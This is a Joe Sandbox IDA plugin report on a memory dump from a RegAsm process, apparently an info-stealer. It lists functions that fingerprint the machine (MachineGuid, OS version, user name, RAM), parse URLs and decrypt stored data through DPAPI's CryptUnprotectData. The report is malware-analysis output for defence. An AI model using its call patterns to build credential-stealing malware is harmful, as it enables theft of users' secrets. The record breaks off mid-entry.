Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3807055897-1526165396
Opcode ID: 6c839766e7553d258449e5a4ce2374fc82e10e1f0f50af40a9a1b86638384a22
Instruction ID: f1e31763aa43a76ed970442d99163c44d7797b0b442af3a0f6dcc7cfd5732480
Opcode Fuzzy Hash: 6c839766e7553d258449e5a4ce2374fc82e10e1f0f50af40a9a1b86638384a22
Instruction Fuzzy Hash: C541A471900244EBCB05EBE6DA46BED77B4AF58308F50086FF901732C1EB385B09C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D56B Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D570
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D5AE
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D620
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D739

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040CD16: _EH_prolog.MSVCRT ref: 0040CD1B

Part of subcall function 0040AB3E: _EH_prolog.MSVCRT ref: 0040AB43

StrCmpCA.SHLWAPI(00000000), ref: 0040D7E6
StrCmpCA.SHLWAPI(00000000), ref: 0040D857

Strings

Stable\, xrefs: 0040D89A
Stable\, xrefs: 0040D663

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy
String ID: Stable\$ Stable\
API String ID: 2120869262-4033978473
Opcode ID: 5ffae97ace4f7575b4188d1e4af4478009e1780cfd26d5e067fe36b2bc16843b
Instruction ID: afa45a1d01831129f3328863285121e3c8e6c4a123211d338c21ff996c9201ff
Opcode Fuzzy Hash: 5ffae97ace4f7575b4188d1e4af4478009e1780cfd26d5e067fe36b2bc16843b
Instruction Fuzzy Hash: 11C18070D00248EBCF01EBBAD9466DDBBB5AF19308F10456EE845772C2EB38571887A6

Uniqueness

Uniqueness Score: -1.00%

Function 0040F18B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F1B1
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,^CB,?,?,00000000), ref: 0040F1CD
RegQueryValueExA.KERNEL32(^CB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040F1EC
CharToOemA.USER32(?,?), ref: 0040F209

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0040F1C3
MachineGuid, xrefs: 0040F1E4
^CB, xrefs: 0040F1B9, 0040F1F2, 0040F1E9, 0040F1BC

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography$^CB
API String ID: 1728412123-1786988806
Opcode ID: 569063b429e25df814444e0f5f63d337d88d16ac840caaeb29fe345f3be8d525
Instruction ID: 3f7c3331a510b80d325cb1298ccf388042b11726b66390429781683a242c4271
Opcode Fuzzy Hash: 569063b429e25df814444e0f5f63d337d88d16ac840caaeb29fe345f3be8d525
Instruction Fuzzy Hash: BD0144B594011DFFDB10DF90EC89EEAB77CEB14704F1000A1B545E1051DB749F899B64

Uniqueness

Uniqueness Score: -1.00%

Function 00406572 Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406577
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040659A
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004065B1
LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004065CD
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004065E7
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004065FD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406608

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
String ID:
API String ID: 3869837436-0
Opcode ID: 705ff68ea3f5719614851a44dd78d1ec8557a3517d297c4456639b82a6506acc
Instruction ID: 59da0b669d0c784481d0fc57140707bb14af0f97430e928722a88339d4051651
Opcode Fuzzy Hash: 705ff68ea3f5719614851a44dd78d1ec8557a3517d297c4456639b82a6506acc
Instruction Fuzzy Hash: 01218B30A00105EBEB209F65DC88AAFBB79FF84710F10092AF552F22D0D7398961CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,00424428,00000000,?,Work Dir: In memory,00000000,?,00424410), ref: 0040ECAB
HeapAlloc.KERNEL32(00000000), ref: 0040ECB2
GlobalMemoryStatusEx.KERNEL32 ref: 0040ECD2
wsprintfA.USER32 ref: 0040ECF8

Strings

@, xrefs: 0040ECCB
%d MB, xrefs: 0040ECF2

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: d7e62a7b7f741abff83ff84ebab0dc1a7a679439fac307ddd2f9ec5ba1b804d0
Instruction ID: 0436995a52cdc52ce1d456ecb16d4e36a2ed727592e1cb53d717ddb9aaead71d
Opcode Fuzzy Hash: d7e62a7b7f741abff83ff84ebab0dc1a7a679439fac307ddd2f9ec5ba1b804d0
Instruction Fuzzy Hash: C7F036B1604208ABE7149BA5DC4AF7E76ADE744705F500429F602E62C1DB74D8058769

Uniqueness

Uniqueness Score: -1.00%

Function 004145DD Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004145E2
memset.MSVCRT ref: 0041460E
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 0041462B
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041464B
lstrcat.KERNEL32(?,?), ref: 0041467A
lstrcat.KERNEL32(?), ref: 0041468D

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologOpenQueryValuememset
String ID:
API String ID: 2333602472-0
Opcode ID: c45a3debf44d8a1de60a73a603875d7143130ba1b02f5394a1e2119693def3b4
Instruction ID: d86490a961668280629c9fc713d96f1f5272fd9ddb126acdf160cc497b11eeb2
Opcode Fuzzy Hash: c45a3debf44d8a1de60a73a603875d7143130ba1b02f5394a1e2119693def3b4
Instruction Fuzzy Hash: 134180B1D0010DABCF10EFA0DC4B9DE7BBDEB14318F00446AF514A2150E7399B968BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00415665 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415745: LoadLibraryA.KERNEL32(kernel32.dll,00415677), ref: 0041574A
Part of subcall function 00415745: GetProcAddress.KERNEL32(00000000), ref: 00415764
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 0041578E
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004157A5
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004157BC
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004157D3
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004157EA
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 00415801
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 00415818
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 0041582F
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 00415846
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 0041585D
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 00415874
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 0041588B
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004158A2
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004158B9
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004158D0
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004158E7
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 004158FE
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 00415915
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 0041592C
Part of subcall function 00415745: GetProcAddress.KERNEL32 ref: 00415943
Part of subcall function 00415745: LoadLibraryA.KERNEL32 ref: 00415954
Part of subcall function 00415745: LoadLibraryA.KERNEL32 ref: 00415965

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E8E7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415689,004243BE), ref: 0040E8F3
Part of subcall function 0040E8E7: HeapAlloc.KERNEL32(00000000,?,?,?,00415689,004243BE), ref: 0040E8FA
Part of subcall function 0040E8E7: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E90E

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

CloseHandle.KERNEL32(00000000), ref: 004156EA
Sleep.KERNEL32(00001B58), ref: 004156F5
OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00424818,?,00000000,004243BE), ref: 00415706
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041571C
CloseHandle.KERNEL32(00000000), ref: 0041572A
ExitProcess.KERNEL32 ref: 00415731

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
String ID:
API String ID: 1043047581-0
Opcode ID: 2a2cda525e942daa53bd38945594255c8dfeed08496384ee4d177346c84c8c96
Instruction ID: 8957079d1b9c83e9d0910b1ebcb7a26b1e36eb779918f429bfacef46039e1bff
Opcode Fuzzy Hash: 2a2cda525e942daa53bd38945594255c8dfeed08496384ee4d177346c84c8c96
Instruction Fuzzy Hash: BB11FC31900014BACB05FBE3EC5ADFE7779AE94708B50096EF502B21D1EF385A1587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403E7A Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00403E7F
??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackH_prologInternetlstrlen
String ID:
API String ID: 503950642-0
Opcode ID: a4889bc9f5b7cf67e046ea18f08f54242b121b33e779780db5d869fd6c5e2170
Instruction ID: 85cd3b5ff436def6a8e73289d6cf030e3e57b768e574c200465fadaf45ef686d
Opcode Fuzzy Hash: a4889bc9f5b7cf67e046ea18f08f54242b121b33e779780db5d869fd6c5e2170
Instruction Fuzzy Hash: 55112E71C00208ABDB14EFA5D845BDD7B78AF55324F20472BF826E72D0DB389A45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004068CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004068D1
GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?), ref: 004068F1

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E5F4: lstrlen.KERNEL32(?,00000000,?,00414F6E,004243BA,004243B7,00000000,00000000,?,00415729), ref: 0040E5FD
Part of subcall function 0040E5F4: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E631

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00423A8C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00423A87), ref: 00406969
LoadLibraryA.KERNEL32 ref: 00406980

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004068E0, 004068E5, 00406904

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 757424748-1193256905
Opcode ID: dfe6f9d21bf96b7ad8f7aa13af750eeaf95851b5835fc1b814bce3426a44844a
Instruction ID: dcee1bc03764bf305e5d38bce8bbad9893a31c8da79870b996d5c565213f1198
Opcode Fuzzy Hash: dfe6f9d21bf96b7ad8f7aa13af750eeaf95851b5835fc1b814bce3426a44844a
Instruction Fuzzy Hash: E5419330900641EFCB25EFA5EC429AD7B72FF14318F10653EE802722E1D7394A66CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BC01

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 00406572: _EH_prolog.MSVCRT ref: 00406577
Part of subcall function 00406572: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040659A
Part of subcall function 00406572: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004065B1
Part of subcall function 00406572: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004065CD
Part of subcall function 00406572: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004065E7
Part of subcall function 00406572: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406608

Part of subcall function 0040FA81: LocalAlloc.KERNEL32(00000040,00411BB2,00000001,00000000,?,00411BB1,00000000,00000000), ref: 0040FA9A

StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC54

Part of subcall function 00406629: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00405D10,00000000,00000000), ref: 00406649
Part of subcall function 00406629: LocalAlloc.KERNEL32(00000040,00405D10,?,?,00405D10,00000000,?,?), ref: 00406657
Part of subcall function 00406629: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00405D10,00000000,00000000), ref: 0040666D
Part of subcall function 00406629: LocalFree.KERNEL32(00000000,?,?,00405D10,00000000,?,?), ref: 0040667C

memcmp.MSVCRT ref: 0040BC92

Part of subcall function 0040668C: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004066AF
Part of subcall function 0040668C: LocalAlloc.KERNEL32(00000040,?,?), ref: 004066C7
Part of subcall function 0040668C: LocalFree.KERNEL32(?), ref: 004066E5

Strings

DPAPI, xrefs: 0040BC8C
, xrefs: 0040BCBD

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2477620391-1819349886
Opcode ID: 6705d7b9d2d74c03edc520fa141e5cd80852f45971dbf6a28ada8b69c953c2ec
Instruction ID: 5353c3052d3df6c0be11dd3c2b849ba4b41f36ab10acb197a87271172ba3cedb
Opcode Fuzzy Hash: 6705d7b9d2d74c03edc520fa141e5cd80852f45971dbf6a28ada8b69c953c2ec
Instruction Fuzzy Hash: B821D2B2D00109ABDF10ABA5CD069EFBB79EF54314F10053AF902B21D1FB3986558BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3C1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428,00000000,?,Work Dir: In memory), ref: 0040F3D5
HeapAlloc.KERNEL32(00000000,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F3DC
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428,00000000,?), ref: 0040F40A
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428,00000000), ref: 0040F426

Strings

Windows 11, xrefs: 0040F3ED

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 4062fc6afbd60cd2796e4d7b40dec3e3d41bdd67d80b18e94c944201aa0ae4c8
Instruction ID: 3b662ffd084f31574f8dff2163645b9bc93353853d65e7b767f39584250602d2
Opcode Fuzzy Hash: 4062fc6afbd60cd2796e4d7b40dec3e3d41bdd67d80b18e94c944201aa0ae4c8
Instruction Fuzzy Hash: 1BF06271600205FBEB249BE1ED0AF6F7A7EEB84B10F105035BB01E61E0D7B49905DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E86C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON

Download Yara Rule

APIs

